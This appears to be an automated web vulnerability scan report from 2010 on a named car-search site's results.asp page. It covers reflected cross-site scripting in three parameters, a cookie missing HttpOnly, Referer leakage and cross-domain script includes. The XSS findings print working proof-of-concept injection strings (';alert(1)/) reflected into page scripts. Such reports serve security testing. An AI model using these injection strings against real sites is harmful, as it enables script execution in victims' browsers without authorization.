1. Cross-site scripting (reflected)
1.1. http://boston30.autochooser.com/results.asp [name of an arbitrarily supplied request parameter]
1.2. http://boston30.autochooser.com/results.asp [pagename parameter]
1.3. http://boston30.autochooser.com/results.asp [postto parameter]
2. Cookie without HttpOnly flag set
3. Cross-domain Referer leakage
4. Cross-domain script include
6. HTML does not specify charset
Severity: | High |
Confidence: | Certain |
Host: | http://boston30 |
Path: | /results.asp |
GET /results.asp?gid=0 Host: boston30.autochooser.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Mon, 08 Nov 2010 07:11:25 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON DSP COR CURa ADMa DEVa TAIa OUR SAMa IND", POLICYREF="URI" Content-Type: text/html Expires: Sun, 07 Nov 2010 07:10:24 GMT Set-Cookie: cid=4340546; expires=Tue, 25-Dec-2012 05:00:00 GMT; path=/ Set-Cookie: ASPSESSIONIDCCBTSBBD Cache-control: private Content-Length: 76429 <HTML> <HEAD> <TITLE>Quick Search</TITLE> <META NAME="ROBOTS" CONTENT="NOFOLLOW"> <script language="JavaScript"> <!-- function saveFavorites() { if (document.results) { document.resu ...[SNIP]... ed for page-specific scripts var acgid = new Array ( '0' ) var acpagename = new Array ( 'dealersearch.asp' ) var acresulttype = new Array ( '2' ) var acpostto = new Array ( 'results.asp' ) var ac5f3d4;alert(1)/ //--> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://boston30 |
Path: | /results.asp |
GET /results.asp?gid=0 Host: boston30.autochooser.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Mon, 08 Nov 2010 07:10:21 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON DSP COR CURa ADMa DEVa TAIa OUR SAMa IND", POLICYREF="URI" Content-Type: text/html Expires: Sun, 07 Nov 2010 07:09:20 GMT Set-Cookie: cid=4340409; expires=Tue, 25-Dec-2012 05:00:00 GMT; path=/ Set-Cookie: ASPSESSIONIDCCBTSBBD Cache-control: private Content-Length: 76012 <HTML> <HEAD> <TITLE>Quick Search</TITLE> <META NAME="ROBOTS" CONTENT="NOFOLLOW"> <script language="JavaScript"> <!-- function saveFavorites() { if (document.results) { document.resu ...[SNIP]... <!-- //This area reserved for page-specific scripts var acgid = new Array ( '0' ) var acpagename = new Array ( 'dealersearch.asp34353';alert(1)/ var acresulttype = new Array ( '2' ) var acpostto = new Array ( 'results.asp' ) //--> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://boston30 |
Path: | /results.asp |
GET /results.asp?gid=0 Host: boston30.autochooser.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Mon, 08 Nov 2010 07:10:59 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON DSP COR CURa ADMa DEVa TAIa OUR SAMa IND", POLICYREF="URI" Content-Type: text/html Expires: Sun, 07 Nov 2010 07:09:59 GMT Set-Cookie: cid=4340496; expires=Tue, 25-Dec-2012 05:00:00 GMT; path=/ Set-Cookie: ASPSESSIONIDCCBTSBBD Cache-control: private Content-Length: 76012 <HTML> <HEAD> <TITLE>Quick Search</TITLE> <META NAME="ROBOTS" CONTENT="NOFOLLOW"> <script language="JavaScript"> <!-- function saveFavorites() { if (document.results) { document.resu ...[SNIP]... area reserved for page-specific scripts var acgid = new Array ( '0' ) var acpagename = new Array ( 'dealersearch.asp' ) var acresulttype = new Array ( '2' ) var acpostto = new Array ( 'results.aspc2bff';alert(1)/ //--> ...[SNIP]... |
Severity: | Low |
Confidence: | Firm |
Host: | http://boston30 |
Path: | /results.asp |
GET /results.asp?gid=0 Host: boston30.autochooser.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Mon, 08 Nov 2010 07:09:43 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON DSP COR CURa ADMa DEVa TAIa OUR SAMa IND", POLICYREF="URI" Content-Type: text/html Expires: Sun, 07 Nov 2010 07:08:42 GMT Set-Cookie: cid=4340341; expires=Tue, 25-Dec-2012 05:00:00 GMT; path=/ Set-Cookie: ASPSESSIONIDCCBTSBBD Cache-control: private Content-Length: 74164 <HTML> <HEAD> <TITLE>Quick Search</TITLE> <META NAME="ROBOTS" CONTENT="NOFOLLOW"> <script language="JavaScript"> <!-- function saveFavorites() { if (document.results) { document.resu ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://boston30 |
Path: | /results.asp |
GET /results.asp?gid=0 Host: boston30.autochooser.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Mon, 08 Nov 2010 07:09:43 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON DSP COR CURa ADMa DEVa TAIa OUR SAMa IND", POLICYREF="URI" Content-Type: text/html Expires: Sun, 07 Nov 2010 07:08:42 GMT Set-Cookie: cid=4340341; expires=Tue, 25-Dec-2012 05:00:00 GMT; path=/ Set-Cookie: ASPSESSIONIDCCBTSBBD Cache-control: private Content-Length: 74164 <HTML> <HEAD> <TITLE>Quick Search</TITLE> <META NAME="ROBOTS" CONTENT="NOFOLLOW"> <script language="JavaScript"> <!-- function saveFavorites() { if (document.results) { document.resu ...[SNIP]... </SCRIPT> <link rel=stylesheet type="text/css" href="http://www.carfind <script src="http://www ...[SNIP]... </style> <script src="http://www.homefind ...[SNIP]... <td><a href=http://www.carfind ...[SNIP]... <td colspan="2" bgcolor="#996633"><img border="0" src="http://www.carfind <td colspan="2" bgcolor="#FFFFFF"><img border="0" src="http://www.carfind ...[SNIP]... <td width="48"><img border="0" src="http://www.carfind ...[SNIP]... <td class=whiteCell width=1><img src=http://www.bosto ...[SNIP]... <td align=center bgcolor="#EA8C00" onMouseOver="mOverNav ...[SNIP]... <td align=center bgcolor="#EA8C00" onMouseOver="mOverNav ...[SNIP]... <td align=center bgcolor="#EA8C00" onMouseOver="mOverNav ...[SNIP]... <td align=center bgcolor="#EA8C00" onMouseOver="mOverNav ...[SNIP]... <td align=center bgcolor="#C5AF7D" onMouseOver="mOverNav2 ...[SNIP]... <br> <a href=http://www.carfind ...[SNIP]... <b><a href=http://www.carfind ...[SNIP]... </font><a href="http://www.carfind ...[SNIP]... </font><a href="http://www.carfind ...[SNIP]... </font><a href="http://www.carfind ...[SNIP]... </font><a href="http://www.jobfind ...[SNIP]... </font><a href="http://www.homefind ...[SNIP]... <font class="storyFont"><a href="http://www.hiasys ...[SNIP]... <font class="storyFont"><a href="http://www.hiasys ...[SNIP]... </table> <script src="http://www.google </script> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://boston30 |
Path: | /results.asp |
GET /results.asp?gid=0 Host: boston30.autochooser.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Mon, 08 Nov 2010 07:09:43 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON DSP COR CURa ADMa DEVa TAIa OUR SAMa IND", POLICYREF="URI" Content-Type: text/html Expires: Sun, 07 Nov 2010 07:08:42 GMT Set-Cookie: cid=4340341; expires=Tue, 25-Dec-2012 05:00:00 GMT; path=/ Set-Cookie: ASPSESSIONIDCCBTSBBD Cache-control: private Content-Length: 74164 <HTML> <HEAD> <TITLE>Quick Search</TITLE> <META NAME="ROBOTS" CONTENT="NOFOLLOW"> <script language="JavaScript"> <!-- function saveFavorites() { if (document.results) { document.resu ...[SNIP]... <link rel=stylesheet type="text/css" href="http://www.carfind <script src="http://www ...[SNIP]... </style> <script src="http://www.homefind ...[SNIP]... </table> <script src="http://www.google </script> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://boston30 |
Path: | /results.asp |
GET /results.asp?gid=0 Host: boston30.autochooser.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Mon, 08 Nov 2010 07:09:43 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON DSP COR CURa ADMa DEVa TAIa OUR SAMa IND", POLICYREF="URI" Content-Type: text/html Expires: Sun, 07 Nov 2010 07:08:42 GMT Set-Cookie: cid=4340341; expires=Tue, 25-Dec-2012 05:00:00 GMT; path=/ Set-Cookie: ASPSESSIONIDCCBTSBBD Cache-control: private Content-Length: 74164 <HTML> <HEAD> <TITLE>Quick Search</TITLE> <META NAME="ROBOTS" CONTENT="NOFOLLOW"> <script language="JavaScript"> <!-- function saveFavorites() { if (document.results) { document.resu ...[SNIP]... <a href="mailto:carfind@carfind.com"> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://boston30 |
Path: | /results.asp |
GET /results.asp?gid=0 Host: boston30.autochooser.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Mon, 08 Nov 2010 07:09:43 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON DSP COR CURa ADMa DEVa TAIa OUR SAMa IND", POLICYREF="URI" Content-Type: text/html Expires: Sun, 07 Nov 2010 07:08:42 GMT Set-Cookie: cid=4340341; expires=Tue, 25-Dec-2012 05:00:00 GMT; path=/ Set-Cookie: ASPSESSIONIDCCBTSBBD Cache-control: private Content-Length: 74164 <HTML> <HEAD> <TITLE>Quick Search</TITLE> <META NAME="ROBOTS" CONTENT="NOFOLLOW"> <script language="JavaScript"> <!-- function saveFavorites() { if (document.results) { document.resu ...[SNIP]... |